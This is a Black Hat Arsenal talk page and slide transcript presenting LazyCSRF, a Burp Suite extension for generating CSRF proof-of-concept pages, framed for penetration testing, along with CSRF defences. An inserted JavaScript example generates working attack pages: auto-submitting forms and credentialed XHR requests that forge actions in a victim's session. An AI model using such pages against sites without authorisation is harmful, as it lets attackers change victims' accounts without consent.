LazyCSRF: A More Useful CSRF PoC Generator on BurpSuite @ Black Hat EUROPE 2021 Arsenal

@tkmru
November 11, 2021

Burp Suite is an intercepting HTTP proxy, and it is the de facto tool for web application security testing. The feature of Burp Suite that I like the most is `Generate CSRF PoC`. However, the logic that automatically decides how to represent the request is broken: it tries to generate PoCs using a `form` even for requests that a `form` cannot express, such as JSON bodies and PUT requests. In addition, multibyte characters that display fine in Burp Suite itself are often garbled in the generated CSRF PoC. These were the motivations for creating LazyCSRF.

- https://github.com/tkmru/lazyCSRF
- https://www.blackhat.com/eu-21/arsenal/schedule/index.html#lazycsrf-a-more-useful-csrf-poc-generator-on-burpsuite-25088

Transcript

  1. #BHEU @BlackHatEvents LazyCSRF: A more useful CSRF PoC generator on BurpSuite • Presented by Taichi Kotake, Akatsuki Inc.
  2. Who I am • Name: Taichi Kotake • Country: Japan • Job: Security Engineer @ Akatsuki Inc. • GitHub: tkmru
  3. Me and Black Hat • Black Hat USA 2020 Arsenal: I talked about apk-medit • Black Hat USA 2021 Arsenal: I talked about ipa-medit • Black Hat EUROPE 2021 Arsenal ← NEW!!
  4. 1: Introduction to CSRF
  5. What's CSRF • CSRF (Cross-site request forgery) is a web app vulnerability • It allows an attacker to induce users to perform actions that they do not intend to perform
  6. What's CSRF (diagram: Victim, Attacker's Website, Attacker, Server; the forged request changes the email address, password etc. and the server answers 200 OK)
  7. Conditions for a successful attack • Cookie-based session handling: the victim needs to have an active session with the target website • The request parameters are known to the attacker • The victim accesses a fake website created by the attacker
  8. What is the impact of CSRF • The attacker causes the victim to unintentionally execute functions of the web application: changing the profile, email address, password, etc.; sending a message; deleting an account; etc.
  9. Preventing CSRF • Web apps need a way to determine whether an HTTP request was legitimately generated via the application's UI • A CSRF token is used to prevent CSRF attacks
  10. Preventing CSRF • A CSRF token is a secure random token • It should be unique per user session • It should be a large enough random value that it is infeasible to guess
  11. Preventing CSRF • These tokens are inserted as hidden parameters of HTML forms related to critical server-side operations • The web app server rejects the request if the submitted CSRF token does not match the token stored for the session
  12. Preventing CSRF with a CSRF token (diagram: Victim, Attacker's Website, Attacker, Server; the forged request to change the email address, password etc. arrives without the CSRF token)
  13. Does SameSite=Lax prevent CSRF? • The SameSite attribute can be used to control whether and how cookies are submitted in cross-site requests • Using SameSite=Lax as a defence against CSRF has become popular recently • Set-Cookie: SessionId=XXXXXXXXXXXXXXXXXXX; SameSite=Lax;
  14. Does SameSite=Lax prevent CSRF? • If SameSite=Lax is set, cross-site requests using POST/PATCH/PUT etc. will not include the cookie; only a top-level navigation with GET still carries it • It provides only a partial defence against CSRF attacks • Set-Cookie: SessionId=XXXXXXXXXXXXXXXXXXX; SameSite=Lax;
  15. Preventing CSRF using SameSite=Lax (diagram: Victim, Attacker's Website, Attacker, Server; a cross-site POST/PATCH/PUT request versus a GET request)
  16. SameSite=Lax is not enough • Some applications implement sensitive actions using GET requests, and a top-level cross-site GET still carries a Lax cookie • Note also that Chrome's "Lax by default" treatment of cookies that carry no SameSite attribute still sends them on top-level cross-site POSTs for two minutes after the cookie was set, so set the attribute explicitly instead of relying on the default • It is not recommended to rely solely on SameSite cookies as a defence against CSRF
  17. Writing CSRF PoC HTML is a hassle • For pen-testing, security engineers write a PoC HTML to see whether a CSRF attack can actually be performed • Writing such a PoC by hand is a hassle
  18. 2: Introduction to the Burp Suite
  19. Burp Suite is the de-facto testing tool • Burp Suite is a proxy tool made by PortSwigger • It is the de-facto penetration testing tool for assessing web applications
  20. Burp Suite has many useful features • Built-in Chromium browser for easy set-up of HTTP(S) interception • Built-in web vulnerability scanner (Burp Suite Professional only) • Extensions can be written in Java, Python or Ruby • etc.
  21. Generating CSRF PoC is my favorite feature • Burp Suite can be used to generate a PoC CSRF attack • To access this feature, select a URL or HTTP request anywhere within Burp, and choose "Generate CSRF PoC" under "Engagement tools" in the context menu
  22. But sometimes it's stressful • Multibyte characters (like Japanese) are garbled…😢 • It tries to generate the PoC using a form even for requests that cannot be represented by a form, such as those with JSON parameters or PUT requests
  23. 3: Introduction to LazyCSRF
  24. LazyCSRF aims to solve the problems of Burp • I am frustrated with the CSRF PoC generated by Burp Suite • So I created a Burp extension called LazyCSRF to solve these problems • It's implemented in Java
  25. Features of LazyCSRF • Automatically switches to a PoC using XMLHttpRequest in the case of JSON parameters or PUT/PATCH/DELETE etc. • Supports displaying multibyte characters (like Japanese) • Generates CSRF PoCs with the Burp Suite Community Edition
  26. 1. Automatically switch to PoC using XHR • LazyCSRF automatically switches to XHR when the PoC cannot be generated with <form> • Allows JSON parameters to be sent using XHR • Allows sending a PATCH/PUT/DELETE request using XHR • Caveat: a cross-origin XHR that uses PUT/PATCH/DELETE or sets a Content-Type such as application/json is preflighted, so the browser only sends it if the target answers the preflight with permissive CORS headers; check the preflight response before concluding that the endpoint is exploitable
  27. Burp Suite also supports PoC using XHR • Although it doesn't switch automatically, Burp Suite can also generate a PoC using XHR
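The form-or-XHR decision on slides 25 to 27, as an added example in JavaScript (Node.js) that is not LazyCSRF's code: a captured request is represented as `{ method, url, headers, body }` (an assumption; LazyCSRF reads it from Burp's extender API), and `generatePoc` emits a self-submitting `<form>` when the request is a GET or a URL-encoded POST and an `XMLHttpRequest` PoC otherwise. Multipart forms are left out to keep the example short.

```javascript
// Added example, not LazyCSRF's code: choose <form> or XMLHttpRequest for a
// captured request and emit the PoC HTML. The request shape
// { method, url, headers, body } is an assumption for the illustration.

// Escape a value for use in HTML text or a quoted attribute.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Embed a string inside a <script> block: JSON-quote it and neutralise '<'
// so a body containing "</script>" cannot end the block early.
function jsString(s) {
  return JSON.stringify(s).replace(/</g, '\\u003c');
}

// Case-insensitive Content-Type lookup; empty string when absent.
function contentType(req) {
  const h = req.headers || {};
  const key = Object.keys(h).find(k => k.toLowerCase() === 'content-type');
  return key ? String(h[key]) : '';
}

// A <form> can express a GET (query string) or a POST with a form encoding.
// Anything else (JSON, XML, PUT/PATCH/DELETE) needs XHR. Multipart is
// omitted here to keep the example short.
function canUseForm(req) {
  const method = req.method.toUpperCase();
  if (method === 'GET') return true;
  if (method === 'POST') {
    return contentType(req).toLowerCase().startsWith('application/x-www-form-urlencoded');
  }
  return false;
}

function formPoc(req) {
  const method = req.method.toUpperCase();
  const u = new URL(req.url);
  // For GET the browser replaces the action's query string with the form
  // fields, so the query parameters become hidden inputs instead.
  const params = method === 'GET' ? new URLSearchParams(u.search) : new URLSearchParams(req.body || '');
  const action = method === 'GET' ? u.origin + u.pathname : req.url;
  const inputs = [...params]
    .map(([k, v]) => `    <input type="hidden" name="${escapeHtml(k)}" value="${escapeHtml(v)}">`)
    .join('\n');
  return `<!DOCTYPE html>
<html>
<head><meta charset="utf-8"></head>
<body>
  <form id="csrf" action="${escapeHtml(action)}" method="${method}">
${inputs}
  </form>
  <script>document.getElementById('csrf').submit();</script>
</body>
</html>`;
}

function xhrPoc(req) {
  const ct = contentType(req);
  const header = ct ? `    xhr.setRequestHeader("Content-Type", ${jsString(ct)});\n` : '';
  return `<!DOCTYPE html>
<html>
<head><meta charset="utf-8"></head>
<body>
  <script>
    var xhr = new XMLHttpRequest();
    xhr.open(${jsString(req.method.toUpperCase())}, ${jsString(req.url)}, true);
    xhr.withCredentials = true; // attach the victim's cookies
${header}    xhr.send(${jsString(req.body || '')});
  </script>
</body>
</html>`;
}

// Entry point: reports which PoC style was chosen and returns the HTML.
function generatePoc(req) {
  const kind = canUseForm(req) ? 'form' : 'xhr';
  return { kind, html: kind === 'form' ? formPoc(req) : xhrPoc(req) };
}
```

`withCredentials` makes the browser attach the victim's cookies to the XHR, but a cross-origin XHR with PUT/PATCH/DELETE or a non-form Content-Type is preflighted: if the target does not answer the OPTIONS request with matching `Access-Control-Allow-Origin` and `Access-Control-Allow-Credentials: true` headers, the actual request is never sent, even though the PoC was generated. The `<meta charset="utf-8">` line is what keeps multibyte parameter values intact when the PoC is saved and opened as a file.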
  28. 2. Support displaying multibyte characters • LazyCSRF can generate a CSRF PoC without garbling multibyte characters • Japanese can be displayed! • This only holds when the characters are not already garbled in the Proxy/Repeater tab
  29. (screenshots: the LazyCSRF version next to the built-in CSRF PoC generator)
  30. IExtensionHelpers.bytesToString ignores the encoding • IExtensionHelpers contains helper methods to assist with various common tasks for Burp extensions • IExtensionHelpers.bytesToString can be used to convert data from an array of bytes into a String
  31. IExtensionHelpers.bytesToString ignores the encoding • IExtensionHelpers.bytesToString ignores the encoding and converts the bytes to a string one character per byte • This is probably the cause of the garbled characters in the CSRF PoC generated by Burp Suite
  32. 3. Generating CSRF PoC with the Burp Suite Community Edition • I always use the Professional Edition, so I didn't aim for this • But by creating the CSRF PoC generator as an extension, the Community Edition can also create CSRF PoCs
  33. Installation • Download the JAR from GitHub Releases: https://github.com/tkmru/lazyCSRF/releases/ • In Burp Suite, go to the Extensions tab in the Extender tab, and add a new extension • Select the extension type `Java`, and specify the path of the downloaded JAR
  34. Installation (TODO: paste screenshot)
  35. Usage • You can generate a CSRF PoC by selecting Extensions → LazyCSRF → Generate CSRF PoC By LazyCSRF from the context menu shown by right-clicking in Proxy or Repeater
  36. Usage (screenshot)
  37. (screenshot)
  38. Future Work • Burp Suite hosts the generated PoC on localhost, but LazyCSRF cannot do that yet • Displaying the HTML with syntax colors • I hope to implement these in LazyCSRF in the future
  39. 4: TIPS for Burp extension development
  40. How to use GitHub Actions for Burp extension development? • GitHub Actions is a CI service by GitHub • It is free to use for public repositories • There are still very few examples on the Internet of using it for Burp extension development
  41. How to use GitHub Actions for Burp extension development? • LazyCSRF can be built with the mvn command • When a tagged commit is pushed to GitHub, the build runs via GitHub Actions and the JAR is automatically registered in GitHub Releases
  42. Code Template for Burp Extension Development • While creating LazyCSRF, I also created a code template • If you are developing Burp extensions, please use it! • https://github.com/tkmru/BurpSuiteExtensionTemplate
  43. (screenshot)
  44. 5: Summary
  45. Summary • LazyCSRF eases CSRF testing • LazyCSRF is still a rough tool, so I want to make it more complete • I hope LazyCSRF will become the de facto standard for security testing!
  46. Thank You!! https://github.com/tkmru/lazyCSRF
  47. References • https://portswigger.net/web-security/csrf • https://portswigger.net/web-security/csrf/samesite-cookies • https://www.synopsys.com/glossary/what-is-csrf.html